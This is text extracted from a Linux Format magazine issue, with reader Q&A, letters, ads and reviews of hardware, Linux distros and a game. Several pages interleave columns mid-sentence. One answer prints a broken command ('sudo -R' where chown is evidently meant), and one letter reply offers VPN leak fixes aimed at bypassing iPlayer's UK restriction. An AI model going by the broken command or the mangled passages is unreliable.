vendorid = “051D”
productid = “0002”
product = “Back-UPS ES 850G2 FW:938.
a2 .I USB FW:a2”
serial = “5B2104T78602”
vendor = “American Power Conversion”
bus = “002”
I want to show only the “driver” line
(so I can later put it in a variable), so I run
nut-scanner -U | grep driver . And this is
the result.
# nut-scanner -U | grep driver
SNMP library not found. SNMP search
disabled.
Neon library not found. XML search
disabled.
www.linuxformat.com

IPMI library not found. IPMI search
disabled.
driver = “usbhid-ups”
Obviously I don’t need the first three
lines, but grep still doesn’t filter them
out. Is there a way to tell grep to wait for
the command to finish before filtering, so
I can only get the line that interests me?
( driver = “usbhid-ups" ).
Ava O’Donnell
A This isn’t about whether the
command finishes. Grep will
continue to scan its input and terminate
when the input ends. What you’re seeing in
the first three lines is information sent to
the standard error (stderr) stream. The
Linux terminal has two output streams:
standard output (stdout) and stderr. You’re
piping stdout through grep but stderr is
being sent directly to the terminal.
There are various ways of dealing with
this. There is a -q argument for nut-
scanner that looks like it’ll suppress this
output. If it does, that’s the easiest way.
The second option is to simply ignore
the stderr output. It isn’t passed to grep
so your script will only process the line
found by grep, even if the scripts passes it
to the calling terminal. The more elegant
approach is to redirect the error output to
/dev/null. The two streams are numbered,
1 for stdout and 2 for stderr, so you could
use one of these
# nut-scanner -U 2>/dev/null | grep driver
# nut-scanner -U 2>&1 | grep driver
The first sends all the error output to
/dev/null, the second sends it to stdout,
so everything can be passed through
grep. Either way, you should add something
to your script to make sure that your
nutscanner call hasn’t failed in some way.
Awk may be a better choice than grep
because it enables you to both search for a
[email protected]
, Subscriptions: for magazine issues email
[email protected]
string, like grep, and process the output.
$ nut-scanner -U 2>/dev/null | awk -F\” ‘/
driver/ {print $2}’
The -F option tells awk to use “ as
the field separator. The part between the
slashes is the string to search for and the
contents of the braces is the command to
run on each line that matches the search
string. In this case, it prints out the second
field – the part between the first and
second quotes – which is exactly what
you need. You can wrap this is a command
substitution, assuming you’re doing this in
a shell script, to put the driver name in
a variable all in one line:
$ DRIVER=$(nut-scanner -Uq | awk -F\” ‘/
driver/ {print $2}')
Q Read only flash
I bought a USB flash drive. It works
fine, but I can’t write to the flash drive as
www.techradar.com/pro/linux
The easiest way to handle mounting of USB drives is to let your desktop automounter take care of everything.
a non-root user. I searched around, but
nothing worked.
$ fdisk -l
Disk /dev/sdb: 58.59 GiB, 62914560000
bytes, 122880000 sectors
Disk model: USB DISK 3.1
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /
512 bytes
I/O size (minimum/optimal): 512 bytes /
512 bytes
Disklabel type: dos
Disk identifier: 0x00000000
Device Boot Start End Sectors Size
Id Type
/dev/sdb1 2048 122879999 122877952
58.6G 83 Linux
/dev/sdb1 is ext4, if that matters.
I mount as root. When I try to do that
as non-root it says that I don’t have
permission for it.
Charles White
A The filesystem does indeed matter.
With non-Linux filesystems,
removable devices have a pseudo-
ownership of the user that mounted them,
which would be root in this case. However,
because this is a Linux filesystem, the
ownerships and permissions are stored in
the filesystem itself. If you’re the only user
wanting to access this stick, you can set
everything on the mounted stick to be
owned by your user with
$ sudo -R youruser: /mount/point
If you have more than one user wanting
to write to the stick, either give them each
their own directory on the stick and then
set the ownerships as above, or use a non-
Linux filesystem.
To mount the stick as a normal user you
can either add an entry for it to /etc/fstab:
/dev/sdb1 /mount/point auto
default,users 0 0
ANSWERS
The users option means normal users
can mount and unmount, but this is locked
to /dev/sdb1, which could be a problem
when using two sticks. The answer is to use
either a filesystem label or the filesystems
UUID instead of the device node:
UUID=xxxx /mount/point auto
default,users 0 0
However, there are cleaner ways
of doing this. Most desktops have an
automounter that will take care of this. If
you’re using a terminal, either udisksctl or
pmount will handle this for you:
$ udisksctl mount -b /dev/sdb1
$ pmount sdb1
When you’re finished, flush the caches
and unmount with the corresponding one
of either $ udisksctl unmount -b /dev/sdb1
or $ pumount sdb1 .
GET HELP NOW!
We’d love to try and answer any questions
you send to
no matter what the level. We’ve all been
stuck before, so don’t be shy. However, we’re
only human (although many suspect Jonni
is a robot), so it’s important that you include
as much information as you can. If
something works on one distro but not
another, then tell us. If you get an error
message, please tell us the exact message
and precisely what you did to invoke it.
If you have, or suspect, a hardware
problem, let us know about the hardware.
Consider installing hardinfo or lshw. These
programs list the hardware on your
machine, so send us their output. If you’re
unwilling, or unable, to install these, run the
following commands in a root terminal and
send us the system.txt file too.
uname -a > system.txt
lspci >> system.txt
lspci -vv >> system.txt
July 2022 LXF290 13
Mailserver
MAILSERVER

WRITE TO US Save the earth! and disposal of consumer items. Rather than Bob
Please include a 32-bit EFI in upcoming Linux keeping a 20-year old Dell Thinkpad ticking over, which
Do you have a distributions. Cubic and UCK seem to be obsolete to is a hundred times less efficient than a modern system.
burning Linux- newer distributions. 600K of data can free up a load
related issue
that you want to
of kit that’s out there – energy-efficient stuff that Blocked pipes
can operate on 5V. Save the planet. Do your bit. I’ve used OpenVPN for years on a small device at
discuss? Write
to us at Linux Tony Thomson home. It’s great to be able to log into my home
Format, Future devices when away and also access them when on an
Publishing, Quay Neil says… unsecure Wi-Fi connection.
House, The Not meaning to be negative, but there’s a reason these Now I know this next bit is probably frowned upon
Ambury, Bath, tools don’t support 32-bit Ubuntu any more: 32-bit but hey. I’ve also used NordVPN to try and get iPlayer,
BA1 1UA or email Ubuntu doesn’t exist as such. There’s no impetus for but I’ve had mixed success with this.
lxf.letters@ desktop or server distros to support 32-bit and no Following your article in LXF286 on VPNs I set up a
futurenet.com. amount of badgering is going to change that. VPN using Linode on a UK system in London and
Just maintaining 32-bit kernel support is going to be installed OpenVPN Active Server, which went without
tricky enough, never mind an entire distro ecosystem. a hitch. I set up one user, installed OpenVPN on my
The Linux kernel has reasons for supporting 32-bit Android phone and used the generated profile. This
embedded systems, but again even the industries that worked too. However, on testing with a couple of DNS
use these are failing to provide resources to support Leak Testing tools, one showed no leak, but the other
32-bit. If you want a full read on this issue try this LWN showed leaks. Trying to play iPlayer in Firefox on my
article: https://lwn.net/Articles/838807. phone failed – “Outside UK” – so I was spotted!
I think it’s admirable to keep kit going for as long as Do you have any tips on making my VPN server
possible, and certainly we’ve covered how refurbished more likely to succeed? Should I use any particular
systems can provided computer access to people who DNS servers, firewall settings, routing or what?
otherwise would miss out. If saving the planet is your Francis
aim there are far more environmentally impactful issues
that need to be addressed, such as world-wide Neil says…
governmental policy changes on the use of fossil fuels Glad you liked the VPN article. It’s something we’ve not
really touched on before, but seems a popular topic,
although it’s hard to achieve fully as you’ve
discovered. I’m not sure “frowned upon” is quite the
right term. The BBC states clearly iPlayer can only
be watched from within the UK, unless you
download content for offline viewing.
Hard to say what the leaking is from. Possibly
IPv6 issues? Try disabling that or ensure OpenVPN
is tunnelling IPv6. Old cookies can cause issues and
if your IP doesn’t match the physical geolocation
data. WebRTC being a culprit is mentioned a lot,
though Jonni did cover how to disable this in
Firefox. Enter about:config in the address bar, and
set media.peerconnection.enabled to false.
Oddly, one of the
most recently Archimedes screw
made 32-bit
processors is
I can only imagine that Les Pounder is firmly
the Russian- stuck somewhere in the past. To update this
designed Baikal. article perhaps he should have spent more time
Helpdex

* For full terms and conditions see: www.futureplc.com/terms-conditions

14 LXF290 July 2022 www.linuxformat.com


Hopefully we’ll be taking an in-depth look at RISC OS in another issue.
reading the excellent website www.riscosopen.org,
where he would have learned that the Archimedes
range of computers spawned the next great RISC OS
computer known as the Acorn RiscPC. This was a
major advance on the Archimedes range from Acorn,
and was fitted with a StrongARM processor.
Being an Arch Linux user (Arcolinux), I run a much
more up-to-date emulator available from the Arch
User Repository called RPCEmu. This runs happily
either in a window on my desktop (a Lenovo ThinkPad
T410 Intel Core i5) or can take over the whole
computer and run full screen, using the latest version
of RISC OS – namely RISC OS5.
The Articulator emulator is slow and bug-ridden
compared to RPCEmu, which will happily emulate a
StrongARM-equipped RiscPC running in 128 or even
256MB of RAM.
Contrary to Mr Pounders’ potted history of the
Acorn stable of computers, the company went
on until just before the turn of the last century
producing useful and efficient desktop computers. In
1996 it finally succumbed to the competition.
However, a number of smaller enterprises continued
the development and there are currently a number of
them still selling RISC OS computers.
RISC OS was originally run on a 26-bit processor,
although currently RISC OS 5 runs natively on 32-bit
ARM processors.
John C McCulloch
[email protected]
www.techradar.com/pro/linux
MAILSERVER
LETTER OF THE MONTH
Blooming great
Thanks for the random number article. There are (or were) some
very poor PRNGs around based on the ‘divide and mod’ algorithm.
ERNIE was designed by Tommy Flowers, a Post Office engineer
who specialised in the design of exchanges. He’d been sucked into
Bletchley Park, and designed and supervised the building of
Colossus, the first genuine digital electronic computer, to help
with decoding messages (called Tunny) generated by the Lorenz
SZ 40/42 machine. These messages were much harder to decode
than those created by the Enigma machine. The Lorenz device was
only used by the German High Command (unlike Enigma, which
was used by all military levels).
A remarkable fact is that Colossus ran perfectly the first time
that it was tested. Tommy
Flowers was a great engineer
but received – and still receives
– little recognition.
Dicky Clymo
Neil says…
We’re more than happy to have
Tommy Flowers’ achievements
mentioned here, but I think he’s
certainly recognised for his work,
though there might not have
been a film made about him.
The talented Tommy Flowers himself.
Neil says…
It’s good to know about RPCEmu (find out more about
the emulator at www.marutan.net/rpcemu). We’ll have
to put it through its paces in a future edition of the
magazine. While I disagree with your interpretation of
Les’ article – it was about the Acorn Archimedes, so
detailed mentions on RISC OS and the RiscPC weren’t
necessarily on the cards – it’s handy to get those
details. I’d forgotten all about the RiscPC, from when
I used to work across from Acorn User magazine back
in the mid-1990s!
Hopefully, you’ll be glad to hear we’re planning to
revisit RISC OS and a host of other open source
operating systems, both classic and alternative.
July 2022 LXF290 15
SUBSCRIBE Save money today!

SUBSCRIBE
to Linux Format and get your

PowerKick
YOUR
GIFT!
wireless charger
WORTH
£50 t, Product features
iss ou The PowerKick wireless power bank
Don’t m e now!
subscrib delivers functionality and convenience.
Charge your devices wirelessly or via
cables (USB-A or USB-C)
Built-in kickstand enables you to keep
your device in landscape or portrait
orientation while it’s charging
Suction cups secure PowerKick to your
phone for consistent charging
10,000 mAh lithium polymer battery
Fast charging capability.

SUBSCRIBE NOW!
www.magazinesdirect.com/lin/a45k
Call 0330 333 1113 and quote A45K
16 LXF290 July 2022 www.linuxformat.com
 Save money today! SUBSCRIBE

PLUS: Exclusive access to 1

1) Only available to www.magazinesdirect.com subscribers

the Linux Format subs area!
1,000s of DRM-free
PDF back issues and
articles! Get instant
access back to issue
66 (May 2005) with
tutorials, interviews,
features and reviews.
!
DON’T MISS At linuxformat.com
ars
Includes 5 ye
r &
of Linux Use
Developer
issues
OUTSIDE
THE UK?
CHOOSE YOUR PACKAGE!
Turn to page
for more gre 67
a
subscriber t
deals!

SIX-MONTHLY SIX-MONTHLY DIGITAL EDITION

PRINT EDITION PRINT & DIGITAL EDITION

SAVE! SAVE! SAVE!

PLUS! PLUS!
1
Only 9% Only 47% Only
39%
£33.75 £46.25 £27.50
Six months of Linux Format Six months of Linux Format in both Six issues of Linux Format
in print by Direct Debit print and digital by Direct Debit in digital by Direct Debit

Terms and conditions: Offer closes 30 June, 2022. Offer open to new UK subscribers only. Pricing is guaranteed for the first 12 months and we will notify you
in advance of any price changes. Please allow up to six weeks for delivery of your first subscription issue (up to eight weeks overseas). Your gift will be delivered
separately within 60 days after your first payment has cleared. Gifts only available to subscribers on the UK mainland. Gift not available with a digital subscription.
The full subscription rate is for 12 months (13 issues) and includes postage and packaging. If the magazine ordered changes frequency per annum, we will honour
the number of issues paid for, not the term of the subscription. For full terms and conditions, visit www.magazinesdirect.com/terms. For enquiries please call
+44 (0) 330 333 1113. Lines are open Monday to Friday, 9am to 5pm UK time or email [email protected]. Calls to 0330 numbers will be charged at no
more than a national landline call, and may be included in your phone provider’s call bundle.

www.techradar.com/pro/linux July 2022 LXF290 17

REVIEWS
AMD Ryzen 7 5800X3D
Dave James contemplates what it is to be the fastest.

T
he Ryzen 7 5800X3D is
SPECS architecturally identical to the
Socket: AM4 standard Ryzen 7 5800X, using
Process: TSMC the same Zen 3 processor design, and
7nm FinFET therefore the same chiplet setup that’s
Cores: 8 made AMD’s recent generations of CPU
Threads: 16 such world-beaters. That means you’re
Clock: 3.4GHz getting the same eight core, 16-thread
(4.5GHz boost) layout in a single chiplet (so no potential
Cache: 512KB inter-chiplet latency issues), but a slightly
L1, 4MB L2, slower clock speed because of a
96MB L3 necessarily lower voltage.
Unlocked: No AMD is gambling on that lower operating
GPU: N/A frequency being a small price to pay in
Memory: terms of gaming when it comes to bumping 96MB of cache
128GB max, up the total L3 cache on offer from 32MB can store a lot
of config files.
DDR4-3200, to 96MB. How does that all fit in, you ask?
two-channels, Using a new 3D packaging technique,
ECC support the 5800X3D’s compute chiplet, the Core Complex Die The Ryzen 7 5800X3D is a drop-in upgrade for the
PCIe: v4.0 (CCD), has a new hat. It’s a hat made of a lot of cache majority of existing AMD Ryzen chipsets, and that
20 lanes which is roughly half the areal size of the chip it’s sat on makes it an easy path to improved performance for a
TDP: 105W top of, but contains twice the amount of L3 cache. good number of AMD users. The Zen 4 processors
AMD has been up front about the fact that the 3D arriving this year, on the other hand, require a new
V-Cache in the Ryzen 7 5800X3D has no impact on motherboard, DDR5 memory and possibly a new PSU.
productivity tools, marketing the chip as a specific That’s a huge plus for the AMD chip, but it still faces
gaming processor – although this is complicated on competition from within. Mostly because AMD’s Ryzen
Linux because it doesn’t appear to help Proton/Wine- 5000-series prices have dropped significantly in recent
based games, at least at the moment. Where is does months. For example, the 12-core, 24-thread Ryzen 9
offer significant increases are with machine-learning 5900X is £50 less and would suit desktop users better.
loads and why the V-Cache is employed on AMD’s EPIC That’s one of our favourite ever AMD CPUs, and its
7x73X HPC range. In general, the Ryzen 7 5800X3D gaming performance is still damned impressive. It’ll also
either essentially matches or outperforms the Ryzen 9 deliver incredible multi-threaded compute power, and
5950X. There are also a few times where the new Ryzen we’re sure it’ll still look like a great chip in a couple of
CPU outperforms the standard Core i9 12900K. years and a few CPU generations down the line.
This is a technically elegant, efficient CPU that
Power demands delivers mostly on its promises. It can’t beat Intel’s
Under full CPU load, running a x264 video encoding hulking brute of a Core i9 12900KS in the frame rate
benchmark, the Core i9 12900KS demands 77 per cent war, but it still offers the majority of AMD users an
more power than the Ryzen 7 5800X3D. Looking at the easy upgrade path and for a fraction of the price
relative power draw while gaming of the two chips, the and power demands, too.
Ryzen CPU offers much lower power draw; the Intel chip
delivers 23 per cent higher average frame rates, but
with 47 per cent higher power consumption.
VERDICT
One thing about the 5800X3D, however, is that it’s a DEVELOPER: AMD
hot chip. Admittedly the 12900KS will happily hit 101°C WEB: www.amd.com
under full core load, but at 93°C the new eight-core PRICE: £410
Ryzen CPU runs much hotter than the 16-core 5950X.
It would be easy to dismiss the Zen 3-based FEATURES 8/10 EASE OF USE 9/10
5800X3D in the face of new Zen 4 CPUs arriving before PERFORMANCE 8/10 VALUE 7/10
the end of the year, but it’s because of that this new chip
has a place. The AM4 platform is going to be effectively A technically impressive processor and a fitting epitaph for
retired once Zen 4 releases with a new LGA socket this the AM4 era of AMD’s Ryzen CPUs. It can certainly accelerate
year. But, given that five-year heritage, there are going your machine learning, if that’s what floats your boat.
to be a lot of existing AMD users sitting on an AM4
system they might want to upgrade, but don’t want to Rating 8/10
go through the process of replacing the entire setup.

www.techradar.com/pro/linux July 2022 LXF290 19

REVIEWS Linux distribution

TurnKey Linux 17.0

Lethargy and laziness often get the best of him, but sometimes
Mayank Sharma can turn the tables to his advantage.

T
urnKey Linux is a godsend
IN BRIEF for anyone who has spent
The TurnKey hours preparing a server,
Linux project cobbling together the necessary
produces a components to deploy network
set of pre- accessible software or web apps.
integrated The project produces an extensive
appliances to set of appliances that you can use
quickly deploy to roll out a new server application
all kinds of in no time.
popular open The self-contained appliances
source web pack in a fully functional instance
apps. All of a web app with just enough
appliances are components of an OS to power that
available in program. Their distro of choice is
several formats. Debian, and the latest version of The LAMP Stack includes PHP/Python/Perl support for Apache2 and MariaDB, along with
The bare metal the appliances are built around the Webmin for configuration, and Adminer for database administration.
images are latest Debian 11 Bullseye release.
available for In fact, according to the release notes, virtually all the However, for the latest release the developers have
64-bit machines changes in the latest release have been to the software decided to publish only ISO and AWS EC2 images. They
only, with powering the appliances, rendering them mostly explain that their current priority is to update all the
experimental invisible to the users of the appliances. appliances to the new version 17 platform, and between
support for the For instance, one key change is the move to Python 3 the two builds they can target a fairly large number
Raspberry Pi 4. for much of TurnKey’s build infrastructure, including of their customers. This is because the ISO can be
The memory several tools in the TKLDev appliance, which is useful for deployed across multiple platforms, and the AWS EC2
requirements of TurnKey Linux developers or for anyone interested in images deployed through TurnKey Hub are the project’s
the appliance building a TurnKey Linux system from source. primary source of revenue.
depend on the In fact, when version 17 was first announced, the The developers reckon that putting up the other
number of project launched just two appliances built on the new builds wouldn’t take much time when all appliances
users it needs base: TKLDev and Core. TurnKey Core is the base have been migrated to the version 17 platform. They
to support. operating system which all appliances are built on. also acknowledge that one of the biggest features they
It’s also used as a convenient starting point for custom had pencilled for version 17 is support for UEFI, but had
builds since it includes all the essential components to rule it out because of time constraints. They had also
and conveniences to help manage web apps. hoped to have an IPv6 APT repository for the v17.0
A couple of weeks after the initial announcement, the release, but now plan to make it available after all
project put up another 10 appliances built on the new appliances have been bumped to the new release.
version 17, including several base appliances such as In the same vein, they’ve also had to push back the
LAMPStack, LighttpdPHPFastCGIServer, node.js and plan to migrate TKLBAM to Python 3. This is because
more, which can be used to deploy all sorts of web apps. it’s an integral part of the project, and required a
In addition to upgrading the upstream software in the considerable amount of testing.
appliance, the new version 17 releases receive a slew of
bug fixes and some new user-requested features.
To this end, the new release includes a new Webmin
VERDICT
version (v1.990) and a number of changes to make the DEVELOPER: Jeremy Davis
TurnKey appliances more IPv6 friendly. For instance, the WEB: www.turnkeylinux.org
project has updated individual Webshell tunnel config to LICENCE: Various
support IPv6. It’s also updated its custom backup and
migration tool TKLBAM to ensure it supports the most FEATURES 9/10 EASE OF USE 9/10
recent version of the Internet Protocol. PERFORMANCE 9/10 DOCUMENTATION 8/10

Turn on your heel
TurnKey appliances are available in several formats
depending on the hardware you want to deploy them
on. These can range from bare metal to virtual
machines, and various cloud platforms.
TurnKey appliances is the perfect blend of convenience and
customisability to appeal to all kinds of users and use cases.
Rating 9/10

20 LXF290 July 2022 www.linuxformat.com

 Linux distribution REVIEWS

Rolling Rhino Remix

A rolling Ubuntu release sounds so outrageous Mayank Sharma had
to see for himself if it really delivers on its word and isn’t just a gimmick.

T
he premise of Rolling Rhino
IN BRIEF Remix is simple. Replace
The distro looks Ubuntu’s stable release
like just another repositories with its development
Ubuntu clone, branch, and you’ve got a sort of a
with little visual bleeding-edge rolling release distro.
customisations. Executing the idea into a stable
However, the distro however, takes some doing.
real difference The idea came from Ubuntu
exists under the developer and former Canonical
covers. Although employee Stuart Langridge, who
it starts off as a wrote the Rolling-Rhino script to
regular Ubuntu transform an Ubuntu release
release, a into a rolling release composed
couple of of packages from Ubuntu’s
post-installation development repositories. The The distribution offers a wonderful option for anyone to track the development of the next
tasks transform Rolling Rhino Remix project then Ubuntu release without having to fiddle with the daily installation images.
it into a rolling took those scripts, and extended
release distro them with a couple of custom tools to create the distro. mode to familiarise themselves with all its options, after
that fetches Since the distro is based on packages that are being which the individual options can be toggled.
packages from developed, the developers state that Rolling Rhino In addition to these, the distro also ships with an
the Ubuntu Remix is best used by Ubuntu devs or experienced Arch User Repository (AUR)-like package manager
development Ubuntu users who prefer tracking Ubuntu’s progress – called Pacstall, which has been tweaked to integrate with
branch. even if it comes at the expense of some instability. Rolling Rhino Remix. Refer to the documentation for
using the tool to flesh out your installation with all kinds
Get rolling
SPECS
of open source and popular proprietary packages. While
The project offers an ISO image, the latest (at the time you can use snaps or flatpaks as well, we suggest you
CPU: 2GHz of writing) being 2022.05.03, which has been created install programs via Pacstall, since the distro will update
Memory: 2GB from an Ubuntu Daily Build. It identifies itself as Ubuntu them whenever you use the rhino-update script.
HDD: 25GB and has all the hallmarks of a standard Ubuntu build, Despite its rather experimental nature, the distro
Build: 64-bit except for the custom Rolling Rhino Remix wallpaper. performed well in our limited test. The only time it
only Once installed, you’re supposed to run the rhino- misbehaved was when we interrupted the rhino-
init script, which modifies the installation by altering update process, which took some CLI sorcery to fix.
the /etc/sources.list file, after which it’ll automatically While getting started with the distribution doesn’t
pull the latest updates from the devel repositories. take much effort, and is well documented, the
You wouldn’t notice much difference on the outside, developers advise new users to stay clear. However,
unless the developers have introduced a radical new the project is easy to approach and we’d encourage (do
feature or altered the appearance of the distro. However, we?!?–ED) all Ubuntu users to take it for a spin, even if
the installation is a completely different one now, and only inside a virtual machine, in order to experience this
can’t be maintained using the traditional means. This radical new approach to Ubuntu.
means for tasks such as updating the installation, you’ll
have to ditch the apt-get upgrade command and
instead use the project’s custom rhino-update script.
VERDICT
Among other things the tool will also fetch the latest DEVELOPER: MrBeeBenson and others
kernel directly from the Ubuntu mainline repository. WEB: https://rollingrhino.org
While, you don’t need to use the rhino-init script LICENCE: Various
ever again once the installation has been converted, the
developers suggest you use rhino-update weekly to FEATURES 7/10 EASE OF USE 6/10
pull all the new changes from the devel repositories. PERFORMANCE 7/10 DOCUMENTATION 7/10
The third custom script, rhino-config has just been
rewritten in Rust and enables users to tweak some If you’ve ever wondered how Ubuntu would work as a rolling
important aspects of the rhino-update script. For release distro, Rolling Rhino Remix is your best bet.
instance, you can use rhino-config to disable pulling
the mainline kernel, switch between using snaps and Rating 7/10
flatpaks. New users can use the script in the interactive

www.techradar.com/pro/linux July 2022 LXF290 21

REVIEWS Linux distribution

SysLinuxOS 11.3
Distros that take the kitchen sink approach don’t really appeal
to Mayank Sharma… until, of course, he finds one that does.

S
ysLinuxOS’s developer is
IN BRIEF a system integrator who
SysLinuxOS is wanted an all-on-one
a specialised solution to help him put a system
distro designed through its paces. To that end,
for system the distro offers a plethora of
integrators and networking tools and utilities to
system admins help system integrators evaluate
to give PCs a and assess a PC. SysLinuxOS gets
thorough its tools from Debian, and the latest
shakedown. edition of the distro is based on the
Designed by Debian 11 Bullseye release.
a system The distro is available in two
integrator, the editions. One uses the Mate
distro is full of desktop, while the other ships with
tools and the Gnome desktop. Both ISOs SysLinuxOS is a Swiss Army Knife for system integrators and system administrators, and a handy
utilities to help weigh over 4GB and are available all-in-one Live distro for anyone else.
verify that every only for 64-bit systems. You can dd
component is the ISO on to a USB to thoroughly vet a computer from of documentation. The project has a forum board, but it
working as the Live environment. That said, the distro does include is mostly a ghost town, although the developer has been
expected. The the Calamares installer to help you anchor SysLinuxOS quick to respond to the odd question posted there.
distro comes in on to a computer. Note, however, that the distro Furthermore, besides the brief introductory details that
two installable balloons to take up just under 16GB on the hard disk. are in English, the majority of the documentation, such
Live mediums: A majority of that space is taken up by all the tools as the distro’s blogs, are in Italian.
one that’s based and applications that have been squeezed into the That said, given the distro’s target audience, the lack
on the Mate distro. Being an experienced system integrator himself, of documentation shouldn’t affect take-up. The distro is
desktop, and the developer is also confident that his distro includes well put together and the tools work without a hiccup.
the other on all the tools that one requires on the job. Furthermore, Most of the included tools are well documented by their
Gnome. he claims that all the tools in the distro are pre- respective projects. The distro just brings them together
configured to work straight off the bat. in a well-integrated package.
For starters there’s all kinds of web browsers as well In our tests, SysLinuxOS performed well inside virtual
as remote desktop clients and video-conferencing machines as well as on real hardware, irrespective of
programs. The inclusion of these network tools, along whether it was running from a Live environment or
with office productivity software, makes SysLinuxOS a from the hard disk. Of course, documentation is an
wonderful option even for the average desktop user who important part of any open source project, but we’ll let
can use the distro as a fully usable Live environment. SysLinuxOS slide because it’s a specialised distro and
as such it’s designed for people in the know. Equally
One for all importantly, the distro didn’t really throw up any curve
System and network administrators would appreciate balls that forced us to refer to its official documentation
the inclusion of stalwarts such as Wireshark, Angry IP or ask for help on the forums.
Scanner, Packet Sender, Packet Tracer and more. There’s
also a serial port terminal emulator that admins can
use to configure, troubleshoot and communicate
VERDICT
with all kinds of devices with a serial interface, such as DEVELOPER: Franco Conidi
microcontrollers and routers. There are also some tools WEB: https://syslinuxos.com
for computer forensics and ethical hacking including LICENCE: Various
disk imagers, and offline and online password crackers.
In addition to these specialised tools and utilities, the FEATURES 9/10 EASE OF USE 8/10
distro also includes mainstream open source everyday PERFORMANCE 9/10 DOCUMENTATION 4/10
desktop programs such as LibreOffice, VLC and GIMP,
together with a whole gamut of Mate desktop utilities. Don’t let its lack of documentation stop you from taking the
The inclusion of these everyday utilities helps distro for a spin, especially if you’re an experienced user.
SysLinuxOS pitch itself as a daily driver for power users.
On the downside, as it is with most one-man distros, Rating 7/10
the one weak point that plagues SysLinuxOS is the lack

22 LXF290 July 2022 www.linuxformat.com

 Linux distribution REVIEWS

Q4OS 4.8
Neither a big KDE user nor a fan of Windows, and yet Mayank Sharma
can’t resist the charm of this KDE distro and its Windows installer.
any distros try to do many
IN BRIEF
A Debian-based
M things in an attempt to
appeal to a large number of
desktop distro people, but end up failing to
that ships two impress. Q4OS is a welcome
editions, one exception, in that the distro caters
for older 32-bit for three distinct sets of users.
machines, which Q4OS’ 32-bit edition, for older
uses the computers, comes with a curated
lightweight set of programs to help you get
Trinity desktop the most of your aging workhorse.
environment On the other hand, the main 64-bit
that began as a edition of the distro rocks the
fork of KDE 3.5 KDE Plasma desktop and uses
desktop. The customised tools to tune the
main 64-bit desktop for everyone from those Q4OS’ strength are its custom tools that reduce common administration tasks into a series of
edition uses new to Linux to experienced users. clicks, making them easier to new Linux users.
the latest KDE One of the unique aspects of the
Plasma desktop. distro is its Windows installer that you can use to install of the variations in the list (Synaptic for Trinity, Plasma
The current Q4OS alongside an existing Windows installation Discover for KDE), the existence of LibreOffice in the
Gemini series without worrying about things like disk partitioning. Trinity version doesn’t make sense to us, especially
is a Long Term The installer supports Windows 8, 10 and 11, and in light of better-suited options such as AbiWord.
Support release can work with SecureBoot as well. Other customisation options in the welcome
that’s supported The latest 4.8 release of the Debian-based long-term screen include the ability to install additional desktop
for five years. support distro bundles the recent Debian Bullseye 11.3 environments, including lightweight options such
update. The project offers four download images. Newer as Xfce and Budgie, as well as full-fledged ones like
64-bit machines can grab separate KDE and Trinity Cinnamon and Gnome. You can also use the welcome
SPECS images in Live and install-only options, while the 32-bit screen to change the default application launcher.
CPU: 300MHz Trinity image is available as an install-only download. In terms of documentation, the Q4OS project offers
Memory: The Live images are installable and use the distribution- ample information to help new users get started with
245MB independent Calamares installer for the purpose. their installations. In addition to the user-centric
HDD: 3GB information there’s also several pieces of administration
Build: 32- Quite a show and developer-oriented documentation for the more
and 64-bit The distro boots to a welcome screen, which is one of advanced users. If you get stuck you can take your
the specialities of the distro, and can help users flesh support queries to the fairly active forum boards.
out their installation without much effort. If you haven’t yet tried Q4OS we’d strongly
Out of the box, the default Q4OS installation is pretty encourage you to give it a shot. While the distro will
bare bones, with hardly anything except a web browser. appeal to KDE users, the Trinity edition that adheres
One of the customisation options in the welcome screen to the classic desktop makes for a useful option for
is the desktop profiler that you can use to transform running inside a virtual machine.
your installation with a single click. The profiler lists
multiple options, a couple of which will fetch and install
all kinds of desktop productivity tools, while a third will
VERDICT
install just enough components to help you build your DEVELOPER: Q4OS dev team
installation from scratch as per your requirements. WEB: https://q4os.org
Note that while the distro does enable you to view LICENCE: GPL and others
information about the packages bundled in each
profile, it doesn’t give you an estimate of the size FEATURES 8/10 EASE OF USE 8/10
of the download when installing a profile. PERFORMANCE 8/10 DOCUMENTATION 8/10
The distro also uses its own custom application
centre that you can use to install various mainstream A solid distro that offers enough conveniences to appeal to
programs. The number and type of program varies new Linux users without side-lining experienced ones.
based on the edition, with the Trinity version hosting
about a dozen, while the full-fledged KDE Plasma Rating 8/10
edition listing over 50. While we agree with some

www.techradar.com/pro/linux July 2022 LXF290 23

EXPLORE THE POSSIBILITIES THAT
LINUX HAS TO OFFER
From open-source software to coding masterclasses and Raspberry Pi
projects, get the most from your machine with this exciting array of expert
tutorials, guides and advice from the minds behind Linux Format magazine.

ON SALE
NOW

Ordering is easy. Go online at:

Or get it from selected supermarkets & newsagents

 Dungeon crawler REVIEWS

Shattered Pixel Dungeon

The only certainties in life are death, taxes and middle management,
and Neil Mohr knows which two are the least painful to deal with.
ixel Dungeon is something of
SPECS
Minimum
P a legend in mobile gaming
circles. It’s also open source,
OS: Ubuntu which means there are a bazillion
16.04 64-bit terrible copies floating around on
GPU: OpenGL Google Play. One of the few high-
2.0+ compatible quality options is Shattered Pixel
HDD: 100MB Dungeon, which has recently gained a
CPU: 64-bit polished PC port on Steam as part of
its continuous update process that’s
Recommended detailed in detail on its dev blog. Did
OS: Ubuntu we mention this is GPL v3 licenced?
20.04 64-bit Who knew you could make a
profitable open source game!
Shattered Pixel Dungeon is a game
set within dungeons portrayed in a I’ve had it with these blinking snakes, in this blinking dungeon!
pixel style. It’s a rogue-like, which means
if your character dies then their world – which is There are a myriad of dangers around every corner.
procedurally generated – is wiped and you’re sentenced They range from the mundane such as crabs and snakes
to perma-death. Just like playing the infamously difficult to the terrifying Drawven DM-2000 killing machine or
Dwarf Fortress, losing is fun! Chaos Elemental. Secrets are common, so you’ll be
After choosing one of four characters – Warrior, Mage, constantly searching for traps, doors and hidden rooms.
Rogue and Huntress – you’re dropped into a top-down, Driving you on beyond the need to explore and basic
2D dungeon ready to explore, collect and punch rats in level progression are quests, which are handed out by
their annoying noses. As is tradition, advancing means various friendly creatures you’ll encounter. These
moving down through levels of the dungeon. The stairs ultimately require you to defeat some sort of boss for
are in random places, which would cause any health (elf? major experience points, and then on the following level
– Jonni) and safety types to choke on their ambrosia. there’ll be a shop where you can buy upgrades.
You’ll fight and explore your way through five different
Helping hand dungeon types over 26 levels, but the fun doesn’t stop
On first play you’re not left to your own devices. There’s there. Once you’ve played the game all the way through
